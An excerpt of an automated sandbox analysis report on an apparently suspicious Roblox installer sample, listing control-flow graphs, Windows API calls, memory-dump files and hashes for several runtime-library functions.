89->75 91->86 92->91 94->75 95->5 96->12 96->38 96->50 96->68 96->97 97->8 98 Function_00D2461E 98->16 99->62 99->89 99->102 101 Function_00D3D003 101->8 103->50 105->33 105->39 105->82 106 Function_00D3383B 106->53 106->62 106->102 107->50 107->58 109 Function_00D2443F 109->7 109->19 109->62 109->78 109->98 109->101 110->8 111->77 112 Function_00D12820 112->23 114->6 114->44 114->63 114->87 114->88

                                                                                  Executed Functions

                                                                                  Function 00D3D0F8 Relevance: .0, Instructions: 29COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 99 d3d0f8-d3d108 100 d3d137-d3d13b 99->100 101 d3d10a-d3d11b GetPEB 99->101 102 d3d12e-d3d135 101->102 103 d3d11d-d3d121 call d3cb8d 101->103 102->100 105 d3d126-d3d129 103->105 105->102 106 d3d12b-d3d12d 105->106 106->102
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A20000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3208451021.0000000000A20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209210171.0000000000E50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209262595.0000000000E54000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209304895.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209335036.0000000000F08000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F12000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F17000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F31000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000FB9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001096000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000109C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000010A2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001106000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001108000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000115B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000011AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000011FD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000124F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001342000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001393000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000013E4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001486000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000014D8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001529000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000157A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000015CB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B6E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B71000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3210617118.0000000001B73000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_a20000_robloxPX1instaler.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a6adbaf0148e7b147bd77c83c74fc48356adaef42b287500d8d23363923985ce
                                                                                  • Instruction ID: 9f02cf658c45d79b7813f07b337f0dc6bd6edac2063b065d91d4374afe439fc4
                                                                                  • Opcode Fuzzy Hash: a6adbaf0148e7b147bd77c83c74fc48356adaef42b287500d8d23363923985ce
                                                                                  • Instruction Fuzzy Hash: 47F03032621324ABCB36DA58D405A99B3E9EB49B61F114096E501EB140C770DE00CBE0
                                                                                  Function 00D3C9FF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 d3c9ff-d3ca0b 1 d3ca9d-d3caa0 0->1 2 d3ca10-d3ca21 1->2 3 d3caa6 1->3 5 d3ca23-d3ca26 2->5 6 d3ca2e-d3ca47 LoadLibraryExW 2->6 4 d3caa8-d3caac 3->4 7 d3cac6-d3cac8 5->7 8 d3ca2c 5->8 9 d3ca49-d3ca52 GetLastError 6->9 10 d3caad-d3cabd 6->10 7->4 12 d3ca9a 8->12 13 d3ca54-d3ca66 call d23142 9->13 14 d3ca8b-d3ca98 9->14 10->7 11 d3cabf-d3cac0 FreeLibrary 10->11 11->7 12->1 13->14 17 d3ca68-d3ca7a call d23142 13->17 14->12 17->14 20 d3ca7c-d3ca89 LoadLibraryExW 17->20 20->10 20->14
                                                                                  APIs
                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,1600CF06,?,00D3CB0C,?,?,?,00000000), ref: 00D3CAC0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A20000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3208451021.0000000000A20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209210171.0000000000E50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209262595.0000000000E54000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209304895.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209335036.0000000000F08000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F12000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F17000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F31000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000FB9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001096000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000109C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000010A2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001106000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001108000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000115B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000011AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000011FD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000124F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001342000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001393000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000013E4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001486000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000014D8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001529000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000157A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000015CB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B6E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B71000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3210617118.0000000001B73000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_a20000_robloxPX1instaler.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary
                                                                                  • String ID: api-ms-$ext-ms-
                                                                                  • API String ID: 3664257935-537541572
                                                                                  • Opcode ID: b8b6a841e896c95f1ef520f82e3a2d9ac566a7632465020e250c72801736dcc3
                                                                                  • Instruction ID: cb9b20526954eb41b1133340acc55ca4338f381d9e8310689e708338040579ea
                                                                                  • Opcode Fuzzy Hash: b8b6a841e896c95f1ef520f82e3a2d9ac566a7632465020e250c72801736dcc3
                                                                                  • Instruction Fuzzy Hash: 5B210372A10329ABC731DB31EC45A6A3768DB557A0F285620E912F72D0EB74EE01C7F0
                                                                                  Function 00D244F4 Relevance: 4.5, APIs: 3, Instructions: 30threadCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 21 d244f4-d24501 call d3a316 24 d24503-d2450b 21->24 25 d24541-d24544 ExitThread 21->25 24->25 26 d2450d-d24511 24->26 27 d24513 call d3d03e 26->27 28 d24518-d2451e 26->28 27->28 30 d24520-d24522 28->30 31 d2452b-d24531 28->31 30->31 32 d24524-d24525 CloseHandle 30->32 31->25 33 d24533-d24535 31->33 32->31 33->25 34 d24537-d2453b FreeLibraryAndExitThread 33->34 34->25
                                                                                  APIs
                                                                                    • Part of subcall function 00D3A316: GetLastError.KERNEL32(00000000,?,00D1E677,00D3B9ED,?,?,00D3A212,00000001,00000364,?,00000006,000000FF,?,00D24464,00E4C1C8,0000000C), ref: 00D3A31A
                                                                                    • Part of subcall function 00D3A316: SetLastError.KERNEL32(00000000), ref: 00D3A3BC
                                                                                  • CloseHandle.KERNEL32(?,?,?,00D2462B,?,?,00D2449D,00000000), ref: 00D24525
                                                                                  • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,00D2462B,?,?,00D2449D,00000000), ref: 00D2453B
                                                                                  • ExitThread.KERNEL32 ref: 00D24544
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A20000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3208451021.0000000000A20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209210171.0000000000E50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209262595.0000000000E54000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209304895.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209335036.0000000000F08000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F12000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F17000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F31000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000FB9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001096000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000109C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000010A2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001106000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001108000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000115B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000011AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000011FD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000124F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001342000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001393000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000013E4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001486000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000014D8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001529000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000157A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000015CB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B6E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B71000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3210617118.0000000001B73000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_a20000_robloxPX1instaler.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                  • String ID:
                                                                                  • API String ID: 1991824761-0
                                                                                  • Opcode ID: ec8c75d0b59db03a6b959922b4293e67133a362bb15aa98602edbdaf751cf15e
                                                                                  • Instruction ID: 85f626d4bab082426ea3b1508786f5ebda0b394aa402ea4db5fe4d699e1338ce
                                                                                  • Opcode Fuzzy Hash: ec8c75d0b59db03a6b959922b4293e67133a362bb15aa98602edbdaf751cf15e
                                                                                  • Instruction Fuzzy Hash: 40F012305007206BDB326F75EC0CA5A3A99AF11368F1C4710FCA5D76A0DB74DD82D671
                                                                                  Function 00D2443F Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00E4C1C8,0000000C), ref: 00D24452
                                                                                  • ExitThread.KERNEL32 ref: 00D24459
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A20000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3208451021.0000000000A20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209210171.0000000000E50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209262595.0000000000E54000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209304895.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209335036.0000000000F08000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F12000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F17000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F31000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000FB9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001096000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000109C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000010A2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001106000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001108000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000115B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000011AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000011FD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000124F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001342000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001393000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000013E4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001486000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000014D8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001529000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000157A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000015CB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B6E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B71000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3210617118.0000000001B73000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_a20000_robloxPX1instaler.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastThread
                                                                                  • String ID:
                                                                                  • API String ID: 1611280651-0
                                                                                  • Opcode ID: 5678dd44f281968436cddc4f24acc592d3ad30a8ede653e501cdfa50e97e612f
                                                                                  • Instruction ID: 04baedc8827fabe15790455ad18f531407a0c6c154fbe85b8b5f3dbc1f588a1e
                                                                                  • Opcode Fuzzy Hash: 5678dd44f281968436cddc4f24acc592d3ad30a8ede653e501cdfa50e97e612f
                                                                                  • Instruction Fuzzy Hash: D2F0AF71940310AFDB05BFB0E84AA6E3B75EF41710F204648F41297252CFB49902DB71
                                                                                  Function 00D3A4B0 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 54 d3a4b0-d3a4b9 55 d3a4bb-d3a4ce RtlFreeHeap 54->55 56 d3a4e8-d3a4e9 54->56 55->56 57 d3a4d0-d3a4e7 GetLastError call d1e5d5 call d1e672 55->57 57->56
                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?,00D42F19,?,00000000,?,?,00D431BA,?,00000007,?,?,00D43665,?,?), ref: 00D3A4C6
                                                                                  • GetLastError.KERNEL32(?,?,00D42F19,?,00000000,?,?,00D431BA,?,00000007,?,?,00D43665,?,?), ref: 00D3A4D1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A20000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3208451021.0000000000A20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209210171.0000000000E50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209262595.0000000000E54000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209304895.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209335036.0000000000F08000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F12000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F17000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F31000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000FB9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001096000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000109C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000010A2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001106000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001108000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000115B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000011AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000011FD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000124F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001342000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001393000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000013E4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001486000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000014D8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001529000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000157A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000015CB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B6E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B71000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3210617118.0000000001B73000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_a20000_robloxPX1instaler.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 485612231-0
                                                                                  • Opcode ID: 1d351ba5531e249c662cf91ad767293bdb771eb9e5efc1b296d7ba1a093fee87
                                                                                  • Instruction ID: 8033d3c32ff8ca07308778f2fb773d4e2e2b785185443949cd564e1ce819d62f
                                                                                  • Opcode Fuzzy Hash: 1d351ba5531e249c662cf91ad767293bdb771eb9e5efc1b296d7ba1a093fee87
                                                                                  • Instruction Fuzzy Hash: 40E08C32240314BBDF213BA4EC0DB893B68EB41796F084021FA0CC6160DEB489819BB0
                                                                                  Function 00D3CACA Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 62 d3caca-d3caf2 63 d3caf4-d3caf6 62->63 64 d3caf8-d3cafa 62->64 65 d3cb49-d3cb4c 63->65 66 d3cb00-d3cb07 call d3c9ff 64->66 67 d3cafc-d3cafe 64->67 69 d3cb0c-d3cb10 66->69 67->65 70 d3cb12-d3cb20 GetProcAddress 69->70 71 d3cb2f-d3cb46 69->71 70->71 73 d3cb22-d3cb2d call d3381c 70->73 72 d3cb48 71->72 72->65 73->72
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A20000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3208451021.0000000000A20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmpDownload File
